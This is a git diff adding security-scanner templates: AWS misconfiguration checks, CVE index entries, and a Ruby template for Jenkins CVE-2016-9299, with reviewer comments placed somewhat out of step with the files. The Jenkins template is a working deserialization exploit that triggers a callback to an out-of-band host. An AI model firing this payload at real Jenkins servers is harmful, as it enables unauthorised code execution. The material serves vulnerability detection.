diff --git a/.new-additions b/.new-additions index f4d205db1e..4d7f25942d 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,9 @@ +cloud/aws/dms/dms-multi-az.yaml +cloud/aws/dms/dms-public-access.yaml +cloud/aws/dms/dms-version-upgrade.yaml +cloud/aws/ebs/ebs-encryption-disabled.yaml +cloud/aws/firehose/firehose-server-destination-encryption.yaml +cloud/aws/firehose/firehose-server-side-encryption.yaml dast/cves/2024/CVE-2024-2961.yaml http/cnvd/2024/CNVD-2024-38747.yaml http/cves/2015/CVE-2015-8562.yaml @@ -25,6 +31,7 @@ http/cves/2023/CVE-2023-40931.yaml http/cves/2023/CVE-2023-43373.yaml http/cves/2023/CVE-2023-5558.yaml http/cves/2023/CVE-2023-5561.yaml +http/cves/2024/CVE-2016-9299.yaml http/cves/2024/CVE-2024-22476.yaml http/cves/2024/CVE-2024-32735.yaml http/cves/2024/CVE-2024-32736.yaml @@ -43,17 +50,22 @@ http/cves/2024/CVE-2024-48914.yaml http/cves/2024/CVE-2024-49757.yaml http/cves/2024/CVE-2024-5910.yaml http/cves/2024/CVE-2024-8698.yaml +http/cves/2024/CVE-2024-9061.yaml http/cves/2024/CVE-2024-9234.yaml +http/cves/2024/CVE-2024-9593.yaml http/cves/2024/CVE-2024-9617.yaml +http/cves/2024/CVE-2024-9796.yaml http/default-logins/apache/doris-default-login.yaml http/default-logins/sato/sato-default-login.yaml http/default-logins/zebra/zebra-printer-default-login.yaml +http/exposed-panels/1password-scim-panel.yaml http/exposed-panels/danswer-panel.yaml http/exposed-panels/freescout-panel.yaml http/exposed-panels/nagios/nagios-logserver-panel.yaml http/exposed-panels/olympic-panel.yaml http/exposed-panels/onedev-panel.yaml http/exposed-panels/paloalto-expedition-panel.yaml +http/exposed-panels/reolink-panel.yaml http/exposed-panels/sqlpad-panel.yaml http/exposed-panels/traccar-panel.yaml http/exposed-panels/txadmin-panel.yaml 
@@ -72,6 +84,7 @@ http/technologies/mirth-connect-detect.yaml http/technologies/oracle-fusion-detect.yaml http/technologies/salesforce-b2c-commerce-webdav.yaml http/technologies/wordpress/plugins/burst-statistics.yaml +http/vulnerabilities/hcm/hcm-cloud-lfi.yaml http/vulnerabilities/nagios/nagios-xi-xss.yaml http/vulnerabilities/wordpress/application-pass-xss.yaml http/vulnerabilities/wordpress/wp-footnote-xss.yaml diff --git a/cloud/aws/dms/dms-multi-az.yaml b/cloud/aws/dms/dms-multi-az.yaml new file mode 100644 index 0000000000..00b17552b0 --- /dev/null +++ b/cloud/aws/dms/dms-multi-az.yaml 
@@ -0,0 +1,59 @@
+id: dms-multi-az
+
+info:
+ name: DMS Multi-AZ Not Enabled
+ author: DhiyaneshDK
+ severity: medium
+ description: |
+ Ensure that your Amazon Database Migration Service (DMS) replication instances are using Multi-AZ deployment configurations to provide High Availability (HA) through automatic failover to standby replicas in the event of a failure such as an Availability Zone (AZ) outage, an internal hardware or network outage, a software failure or in case of a planned maintenance session
+ impact: |
+ Not enabling Multi-AZ for Database Migration Service can lead to increased downtime and data loss risks during outages, compromising the availability and reliability of your database operations.
+ remediation: |
+ Enable Multi-AZ support for your Database Migration Service to enhance availability and resilience, ensuring automatic failover and reducing downtime during outages.
+ reference:
+ - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/DMS/multi-az.html
+ - https://docs.aws.amazon.com/cli/latest/reference/dms/describe-replication-instances.html
+ tags: cloud,devops,aws,amazon,dms,aws-cloud-config
+
+variables:
+ region: "us-west-2"
+
+flow: |
+ code(1)
+ for(let ReplicationInstances of iterate(template.replications)){
+ set("replication", ReplicationInstances)
+ code(2)
+ }
+
+self-contained: true
+
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws dms describe-replication-instances --region $region --query "ReplicationInstances[*].ReplicationInstanceArn" --output json
+
+ extractors:
+ - type: json
+ name: replications
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws dms describe-replication-instances --region $region --filters Name=replication-instance-arn,Values=$replication --query "ReplicationInstances[*].MultiAZ" --output json
+
+ matchers:
+ - type: word
+ words:
+ - "false"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"DMS Multi-AZ " + replication + " is not enabled"'
+# digest: 4a0a004730450220052c0de2e02b60b42a79e7d02c2e38f90423664ca041b2dddd276b0f0b55d3fa022100a434388c051cee8dfa5e4d962699aa4abdc66971013a62f1cc3c85a9c434519b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/dms/dms-public-access.yaml b/cloud/aws/dms/dms-public-access.yaml
new file mode 100644
index 0000000000..59a637ebed
--- /dev/null
+++ b/cloud/aws/dms/dms-public-access.yaml
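Review bot: The `variables:` block pins `region: "us-west-2"`, so as written both `aws dms describe-replication-instances` calls audit one region only and replication instances elsewhere are never evaluated; the same default is used in dms-public-access.yaml, dms-version-upgrade.yaml, ebs-encryption-disabled.yaml and both firehose templates in this commit. A comment on the variable would make the scope explicit, for example `# only this region is audited; override it per run and repeat for every region in use`. An empty result is also ambiguous: if the first `aws` call fails (missing credentials or permissions), the `replications` extractor presumably yields nothing and the run looks the same as a compliant account, which is worth stating in `description`. The first `reference` link goes through a `cloudoneconformity-staging` path; please confirm that is the intended public URL.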
@@ -0,0 +1,59 @@
+id: dms-public-access
+
+info:
+ name: Publicly Accessible DMS Replication Instances
+ author: DhiyaneshDK
+ severity: medium
+ description: |
+ Ensure that your Amazon Database Migration Service (DMS) are not publicly accessible from the Internet in order to avoid exposing private data and minimize security risks.
+ impact: |
+ Publicly accessible DMS replication instances expose your database to unauthorized access and potential attacks, increasing the risk of data breaches and compromising the security of sensitive information.
+ remediation: |
+ Restrict access to your DMS replication instances by configuring security groups and network access controls to allow connections only from trusted IP addresses and private subnets, ensuring that they are not publicly accessible.
+ reference:
+ - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/DMS/publicly-accessible.html
+ - https://docs.aws.amazon.com/dms/latest/userguide/CHAP_ReplicationInstance.html
+ tags: cloud,devops,aws,amazon,dms,aws-cloud-config
+
+variables:
+ region: "us-west-2"
+
+flow: |
+ code(1)
+ for(let ReplicationInstances of iterate(template.replications)){
+ set("replication", ReplicationInstances)
+ code(2)
+ }
+
+self-contained: true
+
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws dms describe-replication-instances --region $region --query "ReplicationInstances[*].ReplicationInstanceArn" --output json
+
+ extractors:
+ - type: json
+ name: replications
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws dms describe-replication-instances --region $region --filters Name=replication-instance-arn,Values=$replication --query "ReplicationInstances[*].PubliclyAccessible" --output json
+
+ matchers:
+ - type: word
+ words:
+ - "true"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"DMS Replication Instances " + replication + " Publicly Accessible"'
+# digest: 4b0a00483046022100c2e4b02073095257867ae2f880894485ce4395d427a0f5797433d453d16557b4022100f11bea387537d175614dcbe4c0e1f7a3d19cfe18b2eb5177157de179677aaea4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/dms/dms-version-upgrade.yaml b/cloud/aws/dms/dms-version-upgrade.yaml
new file mode 100644
index 0000000000..3408fff682
--- /dev/null
+++ b/cloud/aws/dms/dms-version-upgrade.yaml
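Review bot: The `remediation` text does not clear the condition this template matches: the check reads `ReplicationInstances[*].PubliclyAccessible`, and tightening security groups or network access controls leaves that flag `true`, so an instance fixed as instructed keeps being reported. As far as I know the flag is set when the replication instance is created and cannot be modified afterwards, so the remediation should say the instance has to be recreated with public accessibility disabled, with security-group restriction described as interim containment. The `description` also reads "(DMS) are not publicly accessible"; `(DMS) replication instances are not publicly accessible` would match the template name.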
@@ -0,0 +1,59 @@
+id: dms-version-upgrade
+
+info:
+ name: DMS Auto Minor Version Upgrade
+ author: DhiyaneshDK
+ severity: medium
+ description: |
+ Ensure that your Amazon Database Migration Service (DMS) replication instances have the Auto Minor Version Upgrade feature enabled in order to receive automatically minor engine upgrades.
+ impact: |
+ Not enabling DMS Auto Minor Version Upgrade can lead to running outdated database versions, increasing vulnerability to security risks and bugs, while missing out on performance improvements and new features provided in minor updates.
+ remediation: |
+ Enable DMS Auto Minor Version Upgrade to automatically apply minor version updates, ensuring your database is always up-to-date with the latest security patches, performance enhancements, and bug fixes.
+ reference:
+ - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/DMS/auto-minor-version-upgrade.html
+ - https://docs.aws.amazon.com/cli/latest/reference/dms/index.html
+ tags: cloud,devops,aws,amazon,dms,aws-cloud-config
+
+variables:
+ region: "us-west-2"
+
+flow: |
+ code(1)
+ for(let ReplicationInstances of iterate(template.replications)){
+ set("replication", ReplicationInstances)
+ code(2)
+ }
+
+self-contained: true
+
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws dms describe-replication-instances --region $region --query "ReplicationInstances[*].ReplicationInstanceArn" --output json
+
+ extractors:
+ - type: json
+ name: replications
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws dms describe-replication-instances --region $region --filters Name=replication-instance-arn,Values=$replication --query "ReplicationInstances[*].AutoMinorVersionUpgrade" --output json
+
+ matchers:
+ - type: word
+ words:
+ - "false"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"DMS Auto Minor Version Upgrade " + replication + " not enabled"'
+# digest: 4b0a00483046022100e170aa216555156ddf46a196e60d6985d37d29f32146f0bfeaeef1ceba09e73c022100f95487bc9c2f2bfe9288a9362f868268f3bb7cd963b36c44be1b6629a06b3a6b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ebs/ebs-encryption-disabled.yaml b/cloud/aws/ebs/ebs-encryption-disabled.yaml
new file mode 100644
index 0000000000..fafa9de383
--- /dev/null
+++ b/cloud/aws/ebs/ebs-encryption-disabled.yaml
@@ -0,0 +1,61 @@
+id: ebs-encryption-disabled
+
+info:
+ name: EBS Encryption - Disabled
+ author: DhiyaneshDK
+ severity: high
+ description: |
+ Ensure that all your Amazon Elastic Block Store (EBS) volumes are encrypted in order to meet security and compliance requirements. With encryption enabled, your EBS volumes can hold sensitive, confidential, and critical data.
+ impact: |
+ Disabling AWS EBS encryption exposes sensitive data to unauthorized access, increasing the risk of data breaches and compliance violations.
+ remediation: |
+ Enable encryption for all existing EBS volumes and ensure that all new volumes created are configured to use encryption by default. Additionally, update any snapshots to be encrypted and use AWS Key Management Service (KMS) to manage encryption keys securely.
+ reference:
+ - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/EBS/ebs-encrypted.html
+ - http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html
+ tags: cloud,devops,aws,amazon,ebs,aws-cloud-config
+
+variables:
+ region: "us-west-2"
+
+flow: |
+ code(1)
+ for(let VolumesVolumeId of iterate(template.volumes)){
+ set("volume", VolumesVolumeId)
+ code(2)
+ }
+
+self-contained: true
+
+code:
+ - engine:
+ - sh
+ - bash
+
+ source: |
+ aws ec2 describe-volumes --region $region --query 'Volumes[*].VolumeId' --output json
+
+ extractors:
+ - type: json
+ name: volumes
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+
+ source: |
+ aws ec2 describe-volumes --region $region --volume-ids $volume --query 'Volumes[*].Encrypted' --output text
+
+ matchers:
+ - type: word
+ words:
+ - "False"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"EBS Encryption " + volumes + " is Disabled"'
+# digest: 4a0a00473045022100fe98ba08fe06c9398f905a0651ac60c5cfbdbeaf2fa0c524aa9d2c0e29d3c75902200ab089e32558f42e2a7f8d5fafb3e309dfe261bad4e417532734222a7cbaa7cf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
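Review bot: The final extractor builds its message from `volumes`, the internal list extracted by the first command, instead of `volume`, the per-iteration value that `flow` sets with `set("volume", VolumesVolumeId)` and that the second command passes to `--volume-ids`. The finding therefore does not reliably name the unencrypted volume that matched, which is the one detail a responder needs from this result. The line should read `- '"EBS Encryption " + volume + " is Disabled"'`, in line with the DMS templates in this commit, which report `replication` rather than `replications`.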
diff --git a/cloud/aws/firehose/firehose-server-destination-encryption.yaml b/cloud/aws/firehose/firehose-server-destination-encryption.yaml
new file mode 100644
index 0000000000..e81d019c7c
--- /dev/null
+++ b/cloud/aws/firehose/firehose-server-destination-encryption.yaml
@@ -0,0 +1,59 @@
+id: firehose-server-destination-encryption
+
+info:
+ name: Firehose Delivery Stream Destination Encryption - Disabled
+ author: DhiyaneshDK
+ severity: medium
+ description: |
+ Ensure that your Kinesis Firehose delivery stream data records are encrypted at destination (i.e. Amazon S3) in order to meet regulatory requirements and protect your Firehose data at rest.
+ impact: |
+ Disabling encryption for Firehose delivery stream destinations can lead to sensitive data being stored unencrypted, increasing the risk of data exposure and unauthorized access.
+ remediation: |
+ Enable encryption for Firehose delivery stream destinations to ensure that all data is encrypted at rest, safeguarding sensitive information from unauthorized access and potential data breaches.
+ reference:
+ - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/Firehose/delivery-stream-destination-encryption.html
+ - https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingKMSEncryption.html
+ tags: cloud,devops,aws,amazon,firehose,aws-cloud-config
+
+variables:
+ region: "us-west-2"
+
+flow: |
+ code(1)
+ for(let DeliveryStreamNames of iterate(template.deliverys)){
+ set("delivery", DeliveryStreamNames)
+ code(2)
+ }
+
+self-contained: true
+
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws firehose list-delivery-streams --region $region --query 'DeliveryStreamNames' --output json
+
+ extractors:
+ - type: json
+ name: deliverys
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws firehose describe-delivery-stream --region $region --delivery-stream-name $delivery --query 'DeliveryStreamDescription.Destinations[*].ExtendedS3DestinationDescription.EncryptionConfiguration' --output json
+
+ matchers:
+ - type: word
+ words:
+ - "NoEncryption"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Firehose Delivery Stream Destination " + delivery + " Encryption is Disabled"'
+# digest: 490a0046304402201742209d94926b372dbccead7a059d88a973ed2020c9a79e7015331a3e66b20002206a6c98cac36c76d372585674da6f65d3dd50ee0053363cb2f9ffeefa9bf88460:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/firehose/firehose-server-side-encryption.yaml b/cloud/aws/firehose/firehose-server-side-encryption.yaml
new file mode 100644
index 0000000000..95e8228086
--- /dev/null
+++ b/cloud/aws/firehose/firehose-server-side-encryption.yaml
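Review bot: The second command inspects only `Destinations[*].ExtendedS3DestinationDescription.EncryptionConfiguration`, so a delivery stream whose destination is not extended S3 returns `null` for that path, never matches `NoEncryption`, and is reported clean without having been assessed. Either state in `description` that only extended-S3 destinations are covered, or extend the query to the S3 configuration nested under the other destination types (as far as I know each carries an `S3DestinationDescription` with its own `EncryptionConfiguration`). The first `aws firehose list-delivery-streams` call also returns one page of names; accounts with many streams may need pagination handled, which should be confirmed against the CLI defaults.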
@@ -0,0 +1,59 @@
+id: firehose-server-side-encryption
+
+info:
+ name: Firehose Delivery Stream Server-Side Encryption - Disabled
+ author: DhiyaneshDK
+ severity: high
+ description: |
+ Ensure that your Amazon Kinesis Data Firehose delivery streams are encrypted using Server-Side Encryption.
+ impact: |
+ Disabling server-side encryption for Firehose delivery streams can result in unencrypted data being stored, exposing sensitive information to unauthorized access and increasing the risk of data breaches.
+ remediation: |
+ Enable server-side encryption for Firehose delivery streams to ensure that data is securely encrypted at rest, protecting sensitive information from unauthorized access.
+ reference:
+ - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/Firehose/delivery-stream-encrypted-with-kms-customer-master-keys.html
+ - https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingKMSEncryption.html
+ tags: cloud,devops,aws,amazon,firehose,aws-cloud-config
+
+variables:
+ region: "us-west-2"
+
+flow: |
+ code(1)
+ for(let DeliveryStreamNames of iterate(template.deliverys)){
+ set("delivery", DeliveryStreamNames)
+ code(2)
+ }
+
+self-contained: true
+
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws firehose list-delivery-streams --region $region --query 'DeliveryStreamNames' --output json
+
+ extractors:
+ - type: json
+ name: deliverys
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws firehose describe-delivery-stream --region $region --delivery-stream-name $delivery --query 'DeliveryStreamDescription.DeliveryStreamEncryptionConfiguration.KeyType' --output json
+
+ matchers:
+ - type: word
+ words:
+ - "null"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Firehose delivery stream " + delivery + " is not encrypted using SSE"'
+# digest: 4a0a00473045022100c27f022ba1deaf796d3a13a7fff3ccc19f5c8ccafb2406a5632741e33645b130022018b443d8917635142e697c54efccbdd18fd4873b7cc9fdebac19537f0ddbcdf7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cves.json b/cves.json
index 7425386f60..ae97c5ef8e 100644
--- a/cves.json
+++ b/cves.json
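Review bot: Matching the word `null` on `DeliveryStreamEncryptionConfiguration.KeyType` is an indirect test for "SSE disabled": the CLI prints `null` whenever that path is absent for any reason, while the encryption state itself is carried by `Status` in the same structure. Querying `DeliveryStreamDescription.DeliveryStreamEncryptionConfiguration.Status` and reporting any value other than `ENABLED` would state the intent directly and would also catch streams still enabling or in a failed state. Streams that read from a Kinesis data stream are, as far as I know, encrypted on the source stream rather than on the delivery stream, so they would likely be flagged here; that caveat belongs in `description`.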
@@ -2717,10 +2717,13 @@ {"ID":"CVE-2024-8877","Info":{"Name":"Riello Netman 204 - SQL Injection","Severity":"critical","Description":"The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8877.yaml"} {"ID":"CVE-2024-8883","Info":{"Name":"Keycloak - Open Redirect","Severity":"medium","Description":"A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2024/CVE-2024-8883.yaml"} {"ID":"CVE-2024-9014","Info":{"Name":"pgAdmin 4 - Authentication Bypass","Severity":"critical","Description":"pgAdmin 4 versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-9014.yaml"} +{"ID":"CVE-2024-9061","Info":{"Name":"WP Popup Builder Popup Forms and Marketing Lead Generation \u003c= 1.3.5 - Arbitrary Shortcode Execution","Severity":"high","Description":"The The WP Popup Builder Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. 
This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-9061.yaml"} {"ID":"CVE-2024-9234","Info":{"Name":"GutenKit \u003c= 2.1.0 - Arbitrary File Upload","Severity":"critical","Description":"The GutenKit Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the install_and_activate_plugin_from_external() function (install-active-plugin REST API endpoint) in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins, or utilize the functionality to upload arbitrary files spoofed like plugins.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-9234.yaml"} {"ID":"CVE-2024-9463","Info":{"Name":"PaloAlto Networks Expedition - Remote Code Execution","Severity":"critical","Description":"An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-9463.yaml"} {"ID":"CVE-2024-9465","Info":{"Name":"Palo Alto Expedition - SQL Injection","Severity":"high","Description":"An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. 
With this, attackers can also create and read arbitrary files on the Expedition system.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-9465.yaml"} +{"ID":"CVE-2024-9593","Info":{"Name":"Time Clock \u003c= 1.2.2 \u0026 Time Clock Pro \u003c= 1.1.4 - Remote Code Execution","Severity":"high","Description":"The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2024/CVE-2024-9593.yaml"} {"ID":"CVE-2024-9617","Info":{"Name":"Danswer - Insecure Direct Object Reference","Severity":"medium","Description":"The application does not verify whether the attacker is the creator of the file, allowing the attacker to directly call the GET /api/chat/file/{file_id} interface to view any user's file.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-9617.yaml"} +{"ID":"CVE-2024-9796","Info":{"Name":"WordPress WP-Advanced-Search \u003c= 3.3.9 - SQL Injection","Severity":"critical","Description":"The WordPress WP-Advanced-Search plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. 
This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-9796.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2004-2687","Info":{"Name":"Distccd v1 - Remote Code Execution","Severity":"high","Description":"distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"network/cves/2004/CVE-2004-2687.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index c7f6dba95a..67fcd15186 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -13888324a39d31ce90973d926d640532 +2d385a9a80b48d960e7e3c78bad06e09 diff --git a/http/cves/2024/CVE-2016-9299.yaml b/http/cves/2024/CVE-2016-9299.yaml new file mode 100644 index 0000000000..7acc80d0b1 --- /dev/null +++ b/http/cves/2024/CVE-2016-9299.yaml 
@@ -0,0 +1,123 @@ +id: CVE-2016-9299 + +info: + name: Jenkins CLI - HTTP Java Deserialization + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server. + reference: + - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/jenkins_ldap_deserialize.rb + - https://nvd.nist.gov/vuln/detail/CVE-2016-9299 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2016-9299 + cwe-id: CWE-90 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* + metadata: + max-request: 1 + verified: true + vendor: jenkins + product: jenkins + shodan-query: product:"jenkins" + fofa-query: icon_hash=81586312 + tags: cve,cve2016,rce,deserialization + +variables: + oast: "{{interactsh-url}}" + +code: + - engine: + - rb + - ruby # requires ruby to be pre-installed on system running nuclei + + source: | + require 'socket' + require 'base64' + + # Define environment variables for host details (make sure they are properly set in your environment) + $Hostname = ENV['Hostname'] + $Host = ENV['Host'] + $Port = ENV['Port'] + interactsh = (ENV['oast']).ljust(45,'/') + url_dns = "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" + $decoded_url_dns = [url_dns].pack("H*") + $decoded_url_dns = $decoded_url_dns.gsub! 
"ewawjwcswxvkjfswcqli1fssv25rq0d8d.oast.online", interactsh + + # Step 1: Send the download request without waiting for a response or closing the socket + def send_download_request(host, port) + download_socket = TCPSocket.new(host, port) + + download_request = <<~REQ + POST /cli HTTP/1.1 + Host: #{$Hostname} + Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93 + Side: download + Content-Type: application/x-www-form-urlencoded + Content-Length: 0\r\n + REQ + + #puts "Sending Download Request..." + download_socket.write(download_request) + + # Return the open socket so we can read from it later + return download_socket + end + + # Step 2: Send the upload request + def send_upload_request(host, port) + socket = TCPSocket.new(host, port) + + # Base64 decoded payload for upload request + chunked_payload = "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\x00\x00\x00\x00\x01\x55" + $decoded_url_dns + + upload_request = <<~REQ + POST /cli HTTP/1.1 + Host: #{$Hostname} + Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93 + Side: upload + Content-Type: application/octet-stream + Content-Length: #{chunked_payload.bytesize}\r\n + REQ + + #puts "Sending Upload Request..." + socket.write(upload_request) + + # Send the binary data (payload) + socket.write(chunked_payload) + + # Read and print the response for the upload request + response = socket.readpartial(1024) + #puts "Received from server (upload response): #{response}" + + # Close the socket for upload request + socket.close + end + + # Step 3: After upload request, read the download request's response + def read_download_response(socket) + #puts "Reading Download Request Response..." 
+ response = socket.readpartial(1024) + socket.close + response + + end + + # Combined steps to perform the operations in the required order + # Step 1: Send download request (don't wait for response, keep the socket open) + download_socket = send_download_request($Host, $Port) + + # Step 2: Send upload request + send_upload_request($Host, $Port) + + # Print the download response + puts read_download_response(download_socket) + + matchers: + - type: dsl + dsl: + - "contains(response,'hudson.remoting.UserRequest')" + - 'contains(interactsh_protocol, "dns")' + condition: and +# digest: 490a0046304402203cca921300c636eb8d986136c3b5dd567649cc0e956e016278f9e8e6d2e2f14602207e558f218d7293d1e2d1fa942bc313b240086e5f74545143c5553d3d044b4831:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-49757.yaml b/http/cves/2024/CVE-2024-49757.yaml index 115f2c1d85..0feb56dce6 100644 --- a/http/cves/2024/CVE-2024-49757.yaml +++ b/http/cves/2024/CVE-2024-49757.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207d49c3297e84b73e97ee50057e586be8609be53b012523511299887a50cad877022100b4437a3ff67854693adb66be76d5b30547c18a9596223a06685fa02932bbc805:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b4f85fbe7f82396cb84d4980b7cab502297c575cda88ad470169b72b87f641cf022100b3da53c83ed560855d843013d6f9ea158f906252de2100fcb836ccf154283dc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-9061.yaml b/http/cves/2024/CVE-2024-9061.yaml new file mode 100644 index 0000000000..8b007ec38d --- /dev/null +++ b/http/cves/2024/CVE-2024-9061.yaml 
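Review bot: The new file is created as `http/cves/2024/CVE-2016-9299.yaml`, but its `id`, `cve-id` and `cve2016` tag all say 2016, and the body is a `code:` template rather than an `http:` one, so anyone selecting or excluding templates by directory or year gets it in the wrong set; the same path is what this commit adds to `.new-additions`. Moving it to a 2016 directory for code-protocol templates would keep path-based filtering accurate. `max-request: 1` also understates the traffic, since the script opens two TCP connections to the target. Both `readpartial(1024)` calls block without a timeout and the sockets are closed only on the success path, so an unresponsive host can stall the scan; a bounded read with cleanup in an `ensure` block would avoid that.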
@@ -0,0 +1,61 @@
+id: CVE-2024-9061
+
+info:
+ name: WP Popup Builder Popup Forms and Marketing Lead Generation <= 1.3.5 - Arbitrary Shortcode Execution
+ author: s4e-io
+ severity: high
+ description: |
+ The The WP Popup Builder Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-9061
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0cac1dc0-87dc-43eb-9db1-638a91200b43?source=cve
+ - https://github.com/RandomRobbieBF/CVE-2024-9061
+ classification:
